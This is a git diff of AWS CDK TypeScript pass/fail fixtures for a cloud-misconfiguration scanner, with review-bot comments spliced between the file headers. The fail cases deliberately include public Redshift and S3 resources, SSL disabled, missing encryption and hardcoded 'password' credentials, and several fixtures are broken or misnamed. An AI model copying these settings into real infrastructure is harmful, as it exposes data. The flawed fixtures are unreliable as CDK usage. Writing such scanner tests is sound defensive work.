--- /dev/null
+++ b/cdk_integration_tests/src/typescript/RDSPubliclyAccessible/pass.ts
@@ -0,0 +1,8 @@
+// SOURCE
+import { DatabaseInstance } from '@aws-cdk/aws-rds';
+
+// SINK
+new DatabaseInstance(stack, 'MyDatabaseInstance', {
+ instanceType: ec2.InstanceType.of(ec2.InstanceClass.BURSTABLE2, ec2.InstanceSize.MICRO),
+ vpc, publicly_accessible: true
+});
diff --git a/cdk_integration_tests/src/typescript/RedShiftSSL/fail__2__.ts b/cdk_integration_tests/src/typescript/RedShiftSSL/fail__2__.ts
new file mode 100644
index 00000000000..3fc0ab5c33c
--- /dev/null
+++ b/cdk_integration_tests/src/typescript/RedShiftSSL/fail__2__.ts
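Review bot: the RDSPubliclyAccessible pass fixture sets `publicly_accessible: true`, which is neither the CDK property name (`publiclyAccessible`) nor a value that should satisfy a publicly-accessible check — `true` is the exposed configuration. Combined with fail.ts, which fails on the property being absent, this suggests the policy keys on the presence of some property rather than on `publiclyAccessible: false`, which would let a genuinely public instance pass. If that is not the intent, change the pass line to `vpc, publiclyAccessible: false` and add a fail case with `publiclyAccessible: true`.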
@@ -0,0 +1,40 @@
+import * as cdk from 'aws-cdk-lib';
+import * as redshift from 'aws-cdk-lib/aws-redshift';
+
+class MyRedshiftClusterParameterGroupStack extends cdk.Stack {
+ constructor(scope: cdk.Construct, id: string, props?: cdk.StackProps) {
+ super(scope, id, props);
+
+ // Define Redshift Cluster Parameter Group with require_ssl parameter
+ new redshift.CfnClusterParameterGroup(this, 'MyRedshiftClusterParameterGroup', {
+ description: 'My Redshift Parameter Group',
+ parameterGroupFamily: 'redshift-1.0',
+ parameters: [
+ {
+ parameterName: 'require_ssl',
+ parameterValue: 'false',
+ },
+ // Add other parameters if needed
+ ],
+ });
+ }
+}
+
+const app = new cdk.App();
+new MyRedshiftClusterParameterGroupStack(app, 'MyRedshiftClusterParameterGroupStack');
+app.synth();
+
+class MyRedshiftClusterParameterGroupStack2 extends cdk.Stack {
+ constructor(scope: cdk.Construct, id: string, props?: cdk.StackProps) {
+ super(scope, id, props);
+
+ // Define Redshift Cluster Parameter Group with abc parameter
+ new redshift.CfnClusterParameterGroup(this, 'MyRedshiftClusterParameterGroup2', {
+ description: 'My Redshift Parameter Group 2',
+ parameterGroupFamily: 'redshift-1.0',
+ });
+ }
+}
+
+new MyRedshiftClusterParameterGroupStack2(app, 'MyRedshiftClusterParameterGroupStack2');
+app.synth();
diff --git a/cdk_integration_tests/src/typescript/RedShiftSSL/pass.ts b/cdk_integration_tests/src/typescript/RedShiftSSL/pass.ts
new file mode 100644
index 00000000000..58bf4c323f2
--- /dev/null
+++ b/cdk_integration_tests/src/typescript/RedShiftSSL/pass.ts
@@ -0,0 +1,25 @@
+import * as cdk from 'aws-cdk-lib';
+import * as redshift from 'aws-cdk-lib/aws-redshift';
+
+class MyRedshiftClusterParameterGroupStack extends cdk.Stack {
+ constructor(scope: cdk.Construct, id: string, props?: cdk.StackProps) {
+ super(scope, id, props);
+
+ // Define Redshift Cluster Parameter Group with require_ssl parameter
+ new redshift.CfnClusterParameterGroup(this, 'MyRedshiftClusterParameterGroup', {
+ description: 'My Redshift Parameter Group',
+ parameterGroupFamily: 'redshift-1.0',
+ parameters: [
+ {
+ parameterName: 'require_ssl',
+ parameterValue: 'true',
+ },
+ // Add other parameters if needed
+ ],
+ });
+ }
+}
+
+const app = new cdk.App();
+new MyRedshiftClusterParameterGroupStack(app, 'MyRedshiftClusterParameterGroupStack');
+app.synth();
diff --git a/cdk_integration_tests/src/typescript/RedshiftClusterEncryption/fail__2__.ts b/cdk_integration_tests/src/typescript/RedshiftClusterEncryption/fail__2__.ts
new file mode 100644
index 00000000000..5707c4e37e6
--- /dev/null
+++ b/cdk_integration_tests/src/typescript/RedshiftClusterEncryption/fail__2__.ts
@@ -0,0 +1,51 @@
+import * as redshift from '@aws-cdk/aws-redshift-alpha';
+import * as kms from 'aws-cdk-lib/aws-kms';
+import * as ec2 from 'aws-cdk-lib/aws-ec2';
+import { Stack, App } from 'aws-cdk-lib';
+
+const app = new App();
+const stack = new Stack(app, 'RedshiftStack');
+
+// Create a VPC
+const vpc = new ec2.Vpc(stack, 'Vpc', {
+ maxAzs: 2
+});
+
+// Create a KMS key for encryption
+const kmsKey = new kms.Key(stack, 'KmsKey');
+
+const cluster = new redshift.Cluster(stack, 'MyCluster', {
+ masterUser: {
+ masterUsername: 'admin',
+ },
+ vpc,
+});
+
+import * as redshift from 'aws-cdk-lib/aws_redshift';
+import * as kms from 'aws-cdk-lib/aws-kms';
+import * as ec2 from 'aws-cdk-lib/aws-ec2';
+import { Stack, App } from 'aws-cdk-lib';
+
+const app = new App();
+const stack = new Stack(app, 'RedshiftStack');
+
+// Create a VPC
+const vpc = new ec2.Vpc(stack, 'Vpc', {
+ maxAzs: 2
+});
+
+// Create a KMS key for encryption
+const kmsKey = new kms.Key(stack, 'KmsKey');
+
+const cfnCluster = new redshift.CfnCluster(stack, 'MyCfnCluster', {
+ clusterType: 'multi-node',
+ dbName: 'mydatabase',
+ masterUsername: 'admin',
+ masterUserPassword: 'password',
+ nodeType: 'ds2.xlarge',
+ numberOfNodes: 3,
+ kmsKeyId: kmsKey.keyArn, // Use the specific KMS key
+ vpcSecurityGroupIds: [ /* security group IDs */ ],
+ clusterSubnetGroupName: vpc.selectSubnets({ subnetType: ec2.SubnetType.PRIVATE_WITH_EGRESS }).subnetIds[0],
+});
+
diff --git a/cdk_integration_tests/src/typescript/RedshiftClusterEncryption/pass.ts b/cdk_integration_tests/src/typescript/RedshiftClusterEncryption/pass.ts
new file mode 100644
index 00000000000..89f606eaa08
--- /dev/null
+++ b/cdk_integration_tests/src/typescript/RedshiftClusterEncryption/pass.ts
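Review bot: The second half of RedshiftClusterEncryption/fail__2__.ts re-imports `redshift`, `kms`, `ec2` and `Stack`/`App` and re-declares `const app`, `stack`, `vpc` and `kmsKey` that are already declared in the first half, which is a duplicate-identifier error in a real TypeScript module; the fixture needs only one import/setup block followed by the two cluster constructs, so drop the second set and let `CfnCluster` reuse the existing `stack`, `vpc` and `kmsKey`. The same copy-pasted duplication is in RedshiftClusterEncryption/pass.ts and in S3BlockPublicACLs/fail__3__.ts. If the halves were meant to be separate L2-versus-Cfn fixtures, splitting them into two files keeps each one compilable.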
@@ -0,0 +1,53 @@
+import * as redshift from '@aws-cdk/aws-redshift-alpha';
+import * as kms from 'aws-cdk-lib/aws-kms';
+import * as ec2 from 'aws-cdk-lib/aws-ec2';
+import { Stack, App } from 'aws-cdk-lib';
+
+const app = new App();
+const stack = new Stack(app, 'RedshiftStack');
+
+// Create a VPC
+const vpc = new ec2.Vpc(stack, 'Vpc', {
+ maxAzs: 2
+});
+
+// Create a KMS key for encryption
+const kmsKey = new kms.Key(stack, 'KmsKey');
+
+const cluster = new redshift.Cluster(stack, 'MyCluster', {
+ masterUser: {
+ masterUsername: 'admin',
+ },
+ vpc,
+ encryption: true,
+});
+
+import * as redshift from 'aws-cdk-lib/aws_redshift';
+import * as kms from 'aws-cdk-lib/aws-kms';
+import * as ec2 from 'aws-cdk-lib/aws-ec2';
+import { Stack, App } from 'aws-cdk-lib';
+
+const app = new App();
+const stack = new Stack(app, 'RedshiftStack');
+
+// Create a VPC
+const vpc = new ec2.Vpc(stack, 'Vpc', {
+ maxAzs: 2
+});
+
+// Create a KMS key for encryption
+const kmsKey = new kms.Key(stack, 'KmsKey');
+
+const cfnCluster = new redshift.CfnCluster(stack, 'MyCfnCluster', {
+ clusterType: 'multi-node',
+ dbName: 'mydatabase',
+ masterUsername: 'admin',
+ masterUserPassword: 'password',
+ nodeType: 'ds2.xlarge',
+ numberOfNodes: 3,
+ encryption: true,
+ kmsKeyId: kmsKey.keyArn, // Use the specific KMS key
+ vpcSecurityGroupIds: [ /* security group IDs */ ],
+ clusterSubnetGroupName: vpc.selectSubnets({ subnetType: ec2.SubnetType.PRIVATE_WITH_EGRESS }).subnetIds[0],
+});
+
diff --git a/cdk_integration_tests/src/typescript/RedshiftClusterLogging/fail.ts b/cdk_integration_tests/src/typescript/RedshiftClusterLogging/fail.ts
new file mode 100644
index 00000000000..2ba5ef3a2be
--- /dev/null
+++ b/cdk_integration_tests/src/typescript/RedshiftClusterLogging/fail.ts
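Review bot: `encryption: true` on `redshift.CfnCluster` is not a property of the underlying AWS::Redshift::Cluster resource, whose flag is `Encrypted` (exposed by CDK as `encrypted`), and as far as I recall the alpha L2 `Cluster` also spells its flag `encrypted`; a pass fixture keyed on a name that real CDK code never uses means the check can miss genuine `encrypted: true` stacks or flag them as unencrypted. Please confirm which attribute name the check inspects and align both the fixture and the check on `encrypted: true,` for the Cfn construct (and the L2 one, if it uses the same name).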
@@ -0,0 +1,13 @@
+// SOURCE
+import { Cluster } from '@aws-cdk/aws-redshift';
+
+// SINK
+// SINK: Vulnerability found due to missing logging enabled
+new Cluster(stack, 'MyRedshiftCluster', {
+ masterUser: {
+ masterUsername: 'admin',
+ masterPassword: 'password',
+ },
+ vpc
+ // logging enabled missing
+});
diff --git a/cdk_integration_tests/src/typescript/RedshiftClusterLogging/pass.ts b/cdk_integration_tests/src/typescript/RedshiftClusterLogging/pass.ts
new file mode 100644
index 00000000000..b3dc48a7820
--- /dev/null
+++ b/cdk_integration_tests/src/typescript/RedshiftClusterLogging/pass.ts
@@ -0,0 +1,15 @@
+// SOURCE
+import { Cluster } from '@aws-cdk/aws-redshift';
+
+// SINK
+// SINK: Vulnerability found due to missing logging enabled
+let bucketName;
+let stack;
+new Cluster(stack, 'MyRedshiftCluster', {
+ masterUser: {
+ masterUsername: 'admin',
+ masterPassword: 'password',
+ },
+ logging_properties: Cluster.LoggingPropertiesProperty = {bucketName: 'name'}
+ // logging enabled missing
+});
\ No newline at end of file
diff --git a/cdk_integration_tests/src/typescript/RedshiftClusterPubliclyAccessible/fail.ts b/cdk_integration_tests/src/typescript/RedshiftClusterPubliclyAccessible/fail.ts
new file mode 100644
index 00000000000..2f3cd26fb8c
--- /dev/null
+++ b/cdk_integration_tests/src/typescript/RedshiftClusterPubliclyAccessible/fail.ts
@@ -0,0 +1,13 @@
+// SOURCE
+import { Cluster } from '@aws-cdk/aws-redshift';
+
+// SINK
+// SINK: Vulnerability found due to publicly accessible cluster
+new Cluster(stack, 'MyRedshiftCluster', {
+ masterUser: {
+ masterUsername: 'admin',
+ masterPassword: 'password',
+ },
+ vpc,
+ publiclyAccessible: true, // publicly accessible cluster
+});
diff --git a/cdk_integration_tests/src/typescript/RedshiftClusterPubliclyAccessible/pass.ts b/cdk_integration_tests/src/typescript/RedshiftClusterPubliclyAccessible/pass.ts
new file mode 100644
index 00000000000..26fb3b30ba5
--- /dev/null
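Review bot: In RedshiftClusterLogging/pass.ts the entry `logging_properties: Cluster.LoggingPropertiesProperty = {bucketName: 'name'}` is not a valid object-literal member (a type annotation followed by `=` inside an object literal does not parse), and `logging_properties` is not the camelCase name the L2 construct exposes, so this pass fixture only passes if the check is keyed on that snake_case spelling. I believe the alpha `Cluster` prop is `loggingProperties` with a `loggingBucket`/`loggingKeyPrefix` shape — worth confirming against the check's attribute lookup — in which case the line should become `loggingProperties: { loggingBucket: bucket },` with `bucket` declared in place of the unused `let bucketName;`. The file also lacks a trailing newline, unlike its siblings.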
+++ b/cdk_integration_tests/src/typescript/RedshiftClusterPubliclyAccessible/pass.ts
@@ -0,0 +1,20 @@
+// SOURCE
+import { Cluster } from '@aws-cdk/aws-redshift';
+
+// SINK
+// SINK: Vulnerability found due to publicly accessible cluster
+new Cluster(stack, 'MyRedshiftCluster', {
+ masterUser: {
+ masterUsername: 'admin',
+ masterPassword: 'password',
+ },
+ vpc,
+ publiclyAccessible: false,
+});
+new Cluster(stack, 'MyRedshiftCluster', {
+ masterUser: {
+ masterUsername: 'admin',
+ masterPassword: 'password',
+ },
+ vpc
+});
diff --git a/cdk_integration_tests/src/typescript/RedshiftInEc2ClassicMode/fail.ts b/cdk_integration_tests/src/typescript/RedshiftInEc2ClassicMode/fail.ts
new file mode 100644
index 00000000000..b0c7319bae7
--- /dev/null
+++ b/cdk_integration_tests/src/typescript/RedshiftInEc2ClassicMode/fail.ts
@@ -0,0 +1,12 @@
+// SOURCE
+import { Cluster } from '@aws-cdk/aws-redshift';
+
+// SINK
+// SINK: Vulnerability found due to Redshift cluster deployed outside of a VPC
+new Cluster(stack, 'MyRedshiftCluster', {
+ masterUser: {
+ masterUsername: 'admin',
+ masterPassword: 'password',
+ },
+ vpc: vpc
+});
diff --git a/cdk_integration_tests/src/typescript/RedshiftInEc2ClassicMode/pass.ts b/cdk_integration_tests/src/typescript/RedshiftInEc2ClassicMode/pass.ts
new file mode 100644
index 00000000000..7aefe9c0d19
--- /dev/null
+++ b/cdk_integration_tests/src/typescript/RedshiftInEc2ClassicMode/pass.ts
@@ -0,0 +1,12 @@
+// SOURCE
+import { Cluster } from '@aws-cdk/aws-redshift';
+
+// SINK
+new Cluster(stack, 'MyRedshiftCluster', {
+ masterUser: {
+ masterUsername: 'admin',
+ masterPassword: 'password',
+ },
+ vpc: vpc,
+ clusterSubnetGroupName: 'name'
+});
diff --git a/cdk_integration_tests/src/typescript/S3BlockPublicACLs/fail.ts b/cdk_integration_tests/src/typescript/S3BlockPublicACLs/fail.ts
new file mode 100644
index 00000000000..c6089d96d1f
--- /dev/null
+++ b/cdk_integration_tests/src/typescript/S3BlockPublicACLs/fail.ts
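Review bot: RedshiftInEc2ClassicMode/fail.ts passes `vpc: vpc` to the L2 `Cluster`, yet its comment says the cluster is "deployed outside of a VPC", and the only thing pass.ts adds is `clusterSubnetGroupName: 'name'`, so what the check actually keys on (presence of a subnet-group name rather than of a VPC) is not stated anywhere. A comment on the fail construct such as `// vpc alone is not enough for this check: no clusterSubnetGroupName is set` would make the expectation explicit; confirm this is the intended attribute, since on the L2 construct the subnet group is normally derived from `vpc`/`vpcSubnets` rather than named directly.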
@@ -0,0 +1,16 @@
+import * as cdk from 'aws-cdk-lib';
+import { Stack, App } from 'aws-cdk-lib';
+import * as s3 from 'aws-cdk-lib/aws-s3';
+
+const app = new App();
+const stack = new Stack(app, 'S3BucketStack');
+
+// Create an S3 bucket with blockPublicAcls enabled
+const bucket = new s3.Bucket(stack, 'MyBucket', {
+ blockPublicAccess: s3.BlockPublicAccess.IGNORE_ACLS,
+ versioned: true,
+ removalPolicy: cdk.RemovalPolicy.DESTROY,
+ autoDeleteObjects: true,
+});
+
+app.synth();
diff --git a/cdk_integration_tests/src/typescript/S3BlockPublicACLs/fail__3__.ts b/cdk_integration_tests/src/typescript/S3BlockPublicACLs/fail__3__.ts
new file mode 100644
index 00000000000..7461ac32d85
--- /dev/null
+++ b/cdk_integration_tests/src/typescript/S3BlockPublicACLs/fail__3__.ts
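Review bot: The comment `// Create an S3 bucket with blockPublicAcls enabled` sits above a bucket configured with `s3.BlockPublicAccess.IGNORE_ACLS`, which is exactly the setting this fail fixture exists to catch, so the comment contradicts the code it describes; change it to `// Bucket that only ignores public ACLs (blockPublicAcls not set) - expected to fail`. The same copied comment heads every bucket in S3BlockPublicACLs/fail__3__.ts, where `blockPublicAcls: false, // Only block public ACLs` is likewise self-contradictory, and in pass.ts/pass2.ts the `// Only block public ACLs` trailer is attached to the `BLOCK_ALL` bucket as well.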
@@ -0,0 +1,46 @@
+import * as cdk from 'aws-cdk-lib';
+import { Stack, App } from 'aws-cdk-lib';
+import { Bucket, BlockPublicAccess } from 'aws-cdk-lib/aws-s3';
+
+const app = new App();
+const stack = new Stack(app, 'S3BucketStack');
+
+// Create an S3 bucket with blockPublicAcls enabled
+const bucket = new Bucket(stack, 'MyBucket', {
+ blockPublicAccess: BlockPublicAccess.IGNORE_ACLS,
+ versioned: true,
+ removalPolicy: cdk.RemovalPolicy.DESTROY,
+ autoDeleteObjects: true,
+});
+
+const bucket2 = new Bucket(stack, 'MyBucket', {
+ versioned: true,
+ removalPolicy: cdk.RemovalPolicy.DESTROY,
+ autoDeleteObjects: true,
+});
+
+app.synth();
+
+import * as cdk from 'aws-cdk-lib';
+import { Stack, App } from 'aws-cdk-lib';
+import * as s3 from 'aws-cdk-lib/aws-s3';
+
+const app = new App();
+const stack = new Stack(app, 'S3BucketStack');
+
+// Create an S3 bucket with blockPublicAcls enabled
+const bucket = new s3.CfnBucket(stack, 'MyBucket', {
+ bucketName: 'my-bucket-name', // Optional: Specify a bucket name
+ versioningConfiguration: {
+ status: 'Enabled',
+ },
+ publicAccessBlockConfiguration: {
+ blockPublicAcls: false, // Only block public ACLs
+ ignorePublicAcls: true,
+ },
+});
+
+bucket.applyRemovalPolicy(cdk.RemovalPolicy.DESTROY);
+
+app.synth();
+
diff --git a/cdk_integration_tests/src/typescript/S3BlockPublicACLs/pass.ts b/cdk_integration_tests/src/typescript/S3BlockPublicACLs/pass.ts
new file mode 100644
index 00000000000..5d369128d40
--- /dev/null
+++ b/cdk_integration_tests/src/typescript/S3BlockPublicACLs/pass.ts
@@ -0,0 +1,23 @@
+import * as cdk from 'aws-cdk-lib';
+import { Stack, App } from 'aws-cdk-lib';
+import * as s3 from 'aws-cdk-lib/aws-s3';
+
+const app = new App();
+const stack = new Stack(app, 'S3BucketStack');
+
+// Create an S3 bucket with blockPublicAcls enabled
+const bucket = new s3.Bucket(stack, 'MyBucket', {
+ blockPublicAccess: s3.BlockPublicAccess.BLOCK_ACLS, // Only block public ACLs
+ versioned: true,
+ removalPolicy: cdk.RemovalPolicy.DESTROY, // NOT recommended for production code
+ autoDeleteObjects: true, // NOT recommended for production code
+});
+
+const bucket2 = new s3.Bucket(stack, 'MyBucket', {
+ blockPublicAccess: s3.BlockPublicAccess.BLOCK_ALL, // Only block public ACLs
+ versioned: true,
+ removalPolicy: cdk.RemovalPolicy.DESTROY, // NOT recommended for production code
+ autoDeleteObjects: true, // NOT recommended for production code
+});
+
+app.synth();
diff --git a/cdk_integration_tests/src/typescript/S3BlockPublicACLs/pass2.ts b/cdk_integration_tests/src/typescript/S3BlockPublicACLs/pass2.ts
new file mode 100644
index 00000000000..dc4dc803e8f
--- /dev/null
+++ b/cdk_integration_tests/src/typescript/S3BlockPublicACLs/pass2.ts
@@ -0,0 +1,24 @@
+import * as cdk from 'aws-cdk-lib';
+import { Stack, App } from 'aws-cdk-lib';
+import { Bucket, BlockPublicAccess } from 'aws-cdk-lib/aws-s3';
+
+const app = new App();
+const stack = new Stack(app, 'S3BucketStack');
+
+// Create an S3 bucket with blockPublicAcls enabled
+const bucket = new Bucket(stack, 'MyBucket', {
+ blockPublicAccess: BlockPublicAccess.BLOCK_ACLS, // Only block public ACLs
+ versioned: true,
+ removalPolicy: cdk.RemovalPolicy.DESTROY, // NOT recommended for production code
+ autoDeleteObjects: true, // NOT recommended for production code
+});
+
+const bucket2 = new Bucket(stack, 'MyBucket', {
+ blockPublicAccess: BlockPublicAccess.BLOCK_ALL, // Only block public ACLs
+ versioned: true,
+ removalPolicy: cdk.RemovalPolicy.DESTROY, // NOT recommended for production code
+ autoDeleteObjects: true, // NOT recommended for production code
+});
+
+app.synth();
+
diff --git a/cdk_integration_tests/src/typescript/S3BlockPublicACLs/pass3.ts b/cdk_integration_tests/src/typescript/S3BlockPublicACLs/pass3.ts
new file mode 100644
index 00000000000..477b0f953c5
--- /dev/null
+++ b/cdk_integration_tests/src/typescript/S3BlockPublicACLs/pass3.ts
@@ -0,0 +1,23 @@
+import * as cdk from 'aws-cdk-lib';
+import { Stack, App } from 'aws-cdk-lib';
+import * as s3 from 'aws-cdk-lib/aws-s3';
+
+const app = new App();
+const stack = new Stack(app, 'S3BucketStack');
+
+// Create an S3 bucket with blockPublicAcls enabled
+const bucket = new s3.CfnBucket(stack, 'MyBucket', {
+ bucketName: 'my-bucket-name', // Optional: Specify a bucket name
+ versioningConfiguration: {
+ status: 'Enabled',
+ },
+ publicAccessBlockConfiguration: {
+ blockPublicAcls: true, // Only block public ACLs
+ ignorePublicAcls: true,
+ },
+});
+
+// Add deletion policy to the bucket
+bucket.applyRemovalPolicy(cdk.RemovalPolicy.DESTROY); // NOT recommended for production code
+
+app.synth();
diff --git a/cdk_integration_tests/src/typescript/S3BlockPublicPolicy/fail.ts b/cdk_integration_tests/src/typescript/S3BlockPublicPolicy/fail.ts
new file mode 100644
index 00000000000..dee086f3e1c
--- /dev/null
+++ b/cdk_integration_tests/src/typescript/S3BlockPublicPolicy/fail.ts
@@ -0,0 +1,8 @@
+// FINDING
+import { Bucket } from '@aws-cdk/aws-s3';
+
+// SINK
+// SINK: Vulnerability found due to S3 bucket missing block public policy
+new Bucket(stack, 'MyBucket', {
+ publicReadAccess: true, // This should be 'false' to block public policy
+});
diff --git a/cdk_integration_tests/src/typescript/S3BlockPublicPolicy/pass.ts b/cdk_integration_tests/src/typescript/S3BlockPublicPolicy/pass.ts
new file mode 100644
index 00000000000..27861a97390
--- /dev/null
+++ b/cdk_integration_tests/src/typescript/S3BlockPublicPolicy/pass.ts
@@ -0,0 +1,11 @@
+// FINDING
+import { Bucket } from '@aws-cdk/aws-s3';
+
+// SINK
+// SINK: Vulnerability found due to S3 bucket missing block public policy
+new Bucket(stack, 'MyBucket', {
+ publicReadAccess: false, // This should be 'false' to block public policy
+});
+new Bucket(stack, 'MyBucket', {
+ random_param: false,
+});
diff --git a/cdk_integration_tests/src/typescript/S3PublicACLRead/fail__3__.ts b/cdk_integration_tests/src/typescript/S3PublicACLRead/fail__3__.ts
new file mode 100644
index 00000000000..701e733dd44
--- /dev/null
+++ b/cdk_integration_tests/src/typescript/S3PublicACLRead/fail__3__.ts
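Review bot: Both S3BlockPublicPolicy fixtures label the import line `// FINDING` while every other fixture in this series uses `// SOURCE`; use `// SOURCE` for consistency so the markers can be grepped uniformly. In pass.ts the trailer `// This should be 'false' to block public policy` was copied from fail.ts and now reads as a correction on a line that already sets `publicReadAccess: false`; `// publicReadAccess explicitly false - expected to pass` describes it, and the second bucket with `random_param: false` deserves a one-line comment saying it covers the attribute-absent default.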
@@ -0,0 +1,34 @@
+import { App, Stack, StackProps } from 'aws-cdk-lib';
+import { Construct } from 'constructs';
+import * as s3 from 'aws-cdk-lib/aws-s3';
+
+class S3BucketExampleStack extends Stack {
+ constructor(scope: Construct, id: string, props?: StackProps) {
+ super(scope, id, props);
+
+ // Bucket with PUBLIC_READ access - Match
+ new s3.Bucket(this, 'MyPublicReadBucket', {
+ accessControl: s3.BucketAccessControl.PUBLIC_READ,
+ });
+
+ new s3.Bucket(this, 'MyPrivateReadBucket');
+
+ // Bucket with PUBLIC_READ_WRITE access
+ new s3.Bucket(this, 'MyPublicReadWriteBucket', {
+ accessControl: s3.BucketAccessControl.PUBLIC_READ_WRITE,
+ });
+
+ // Bucket with publicReadAccess set to true
+ new s3.Bucket(this, 'MyPublicReadAccessBucket', {
+ publicReadAccess: true,
+ });
+
+ // Bucket with publicReadAccess set to true
+ new s3.Bucket(this, 'MyPublicReadAccessBucket', {
+ publicReadAccess: false,
+ });
+ }
+}
+
+const app = new App();
+new S3BucketExampleStack(app, 'S3BucketExampleStack');
diff --git a/cdk_integration_tests/src/typescript/S3PublicACLRead/pass.ts b/cdk_integration_tests/src/typescript/S3PublicACLRead/pass.ts
new file mode 100644
index 00000000000..5355079040b
--- /dev/null
+++ b/cdk_integration_tests/src/typescript/S3PublicACLRead/pass.ts
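Review bot: The last two buckets in S3BucketExampleStack share the construct id 'MyPublicReadAccessBucket', and the second is introduced by `// Bucket with publicReadAccess set to true` although it sets `publicReadAccess: false`; give it a distinct id and a truthful comment, `// Bucket with publicReadAccess explicitly false - should not match` above `new s3.Bucket(this, 'MyPrivateReadAccessBucket', {`. The same id/comment pair is copied into S3PublicACLRead/pass.ts.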
@@ -0,0 +1,30 @@
+import { App, Stack, StackProps } from 'aws-cdk-lib';
+import { Construct } from 'constructs';
+import * as s3 from 'aws-cdk-lib/aws-s3';
+
+class S3BucketExampleStack extends Stack {
+ constructor(scope: Construct, id: string, props?: StackProps) {
+ super(scope, id, props);
+
+ // Bucket with PUBLIC_READ access - Match
+ new s3.Bucket(this, 'MyPublicReadBucket');
+
+ new s3.Bucket(this, 'MyPrivateReadBucket');
+
+ // Bucket with PUBLIC_READ_WRITE access
+ new s3.Bucket(this, 'MyPublicReadWriteBucket', {
+ accessControl: s3.BucketAccessControl.Private,
+ });
+
+ // Bucket with publicReadAccess set to true
+ new s3.Bucket(this, 'MyPublicReadAccessBucket', {});
+
+ // Bucket with publicReadAccess set to true
+ new s3.Bucket(this, 'MyPublicReadAccessBucket', {
+ publicReadAccess: false,
+ });
+ }
+}
+
+const app = new App();
+new S3BucketExampleStack(app, 'S3BucketExampleStack');
diff --git a/cdk_integration_tests/src/typescript/S3RestrictPublicBuckets/fail__2__.ts b/cdk_integration_tests/src/typescript/S3RestrictPublicBuckets/fail__2__.ts
new file mode 100644
index 00000000000..15cf72c1840
--- /dev/null
+++ b/cdk_integration_tests/src/typescript/S3RestrictPublicBuckets/fail__2__.ts
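Review bot: `s3.BucketAccessControl.Private` is not a member of the CDK enum — the member is `BucketAccessControl.PRIVATE` — so this line would not compile, and if the check compares the attribute's text against the public ACL names the bucket passes no matter what value is written here. Use `accessControl: s3.BucketAccessControl.PRIVATE,` so the pass case exercises a real non-public ACL value. The comments `// Bucket with PUBLIC_READ access - Match` and `// Bucket with PUBLIC_READ_WRITE access` were kept from fail__3__.ts and no longer describe these buckets.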
@@ -0,0 +1,43 @@
+import * as cdk from 'aws-cdk-lib';
+import { Construct } from 'constructs';
+import * as s3 from 'aws-cdk-lib/aws-s3';
+
+class S3BucketWithPublicAccessStack extends cdk.Stack {
+ constructor(scope: Construct, id: string, props?: cdk.StackProps) {
+ super(scope, id, props);
+
+ new s3.Bucket(this, 'aaa', {
+ versioned: false, // You can enable versioning if needed
+ removalPolicy: cdk.RemovalPolicy.DESTROY, // Change this according to your retention policy
+ blockPublicAccess: new s3.BlockPublicAccess({
+ blockPublicAcls: true,
+ blockPublicPolicy: true,
+ ignorePublicAcls: true,
+ restrictPublicBuckets: false,
+ }),
+ });
+ }
+}
+
+class PublicS3BucketStack extends cdk.Stack {
+ constructor(scope: Construct, id: string, props?: cdk.StackProps) {
+ super(scope, id, props);
+
+ new s3.CfnBucket(this, 'PublicBucket', {
+ versioningConfiguration: {
+ status: 'Suspended', // You can enable versioning if needed
+ },
+ publicAccessBlockConfiguration: {
+ blockPublicAcls: true,
+ blockPublicPolicy: true,
+ ignorePublicAcls: true,
+ restrictPublicBuckets: false,
+ },
+ });
+ }
+}
+
+const app = new cdk.App();
+new S3BucketWithPublicAccessStack(app, 'S3BucketWithPublicAccessStack');
+new PublicS3BucketStack(app, 'PublicS3BucketStack');
+app.synth();
diff --git a/cdk_integration_tests/src/typescript/S3RestrictPublicBuckets/pass.ts b/cdk_integration_tests/src/typescript/S3RestrictPublicBuckets/pass.ts
new file mode 100644
index 00000000000..6f820166fc7
--- /dev/null
+++ b/cdk_integration_tests/src/typescript/S3RestrictPublicBuckets/pass.ts
@@ -0,0 +1,38 @@
+import * as cdk from 'aws-cdk-lib';
+import { Construct } from 'constructs';
+import * as s3 from 'aws-cdk-lib/aws-s3';
+
+class S3BucketWithPublicAccessStack extends cdk.Stack {
+ constructor(scope: Construct, id: string, props?: cdk.StackProps) {
+ super(scope, id, props);
+
+ new s3.Bucket(this, 'aaa', {
+ versioned: false, // You can enable versioning if needed
+ removalPolicy: cdk.RemovalPolicy.DESTROY, // Change this according to your retention policy
+ blockPublicAccess: s3.BlockPublicAccess.BLOCK_ALL, // Enforce all public access restrictions
+ });
+ }
+}
+
+class PublicS3BucketStack extends cdk.Stack {
+ constructor(scope: Construct, id: string, props?: cdk.StackProps) {
+ super(scope, id, props);
+
+ new s3.CfnBucket(this, 'PublicBucket', {
+ versioningConfiguration: {
+ status: 'Suspended', // You can enable versioning if needed
+ },
+ publicAccessBlockConfiguration: {
+ blockPublicAcls: true,
+ blockPublicPolicy: true,
+ ignorePublicAcls: true,
+ restrictPublicBuckets: true,
+ },
+ });
+ }
+}
+
+const app = new cdk.App();
+new S3BucketWithPublicAccessStack(app, 'S3BucketWithPublicAccessStack');
+new PublicS3BucketStack(app, 'PublicS3BucketStack');
+app.synth();
\ No newline at end of file
diff --git a/cdk_integration_tests/src/typescript/SNSTopicEncryption/fail.ts b/cdk_integration_tests/src/typescript/SNSTopicEncryption/fail.ts
new file mode 100644
index 00000000000..9d3d2192270
--- /dev/null
+++ b/cdk_integration_tests/src/typescript/SNSTopicEncryption/fail.ts
@@ -0,0 +1,17 @@
+import { App, Stack } from 'aws-cdk-lib';
+import * as sns from 'aws-cdk-lib/aws-sns';
+import { Construct } from 'constructs';
+
+class MyStack extends Stack {
+ constructor(scope: Construct, id: string, props?: {}) {
+ super(scope, id, props);
+
+ new sns.Topic(this, 'Topic', {
+ topicName: 'my-topic',
+ });
+ }
+}
+
+const app = new App();
+new MyStack(app, 'MyStack');
+app.synth();
diff --git a/cdk_integration_tests/src/typescript/SNSTopicEncryption/pass.ts b/cdk_integration_tests/src/typescript/SNSTopicEncryption/pass.ts
new file mode 100644
index 00000000000..7fb053f05a3
--- /dev/null
+++ b/cdk_integration_tests/src/typescript/SNSTopicEncryption/pass.ts
@@ -0,0 +1,23 @@
+import { App, Stack } from 'aws-cdk-lib';
+import * as sns from 'aws-cdk-lib/aws-sns';
+import * as kms from 'aws-cdk-lib/aws-kms';
+import { Construct } from 'constructs';
+
+class MyStack extends Stack {
+ constructor(scope: Construct, id: string, props?: {}) {
+ super(scope, id, props);
+
+ // Create a new KMS Key
+ const key = new kms.Key(this, 'MyKey');
+
+ // Create a new SNS Topic using the KMS Key for encryption
+ new sns.Topic(this, 'Topic', {
+ topicName: 'my-topic',
+ masterKey: key,
+ });
+ }
+}
+
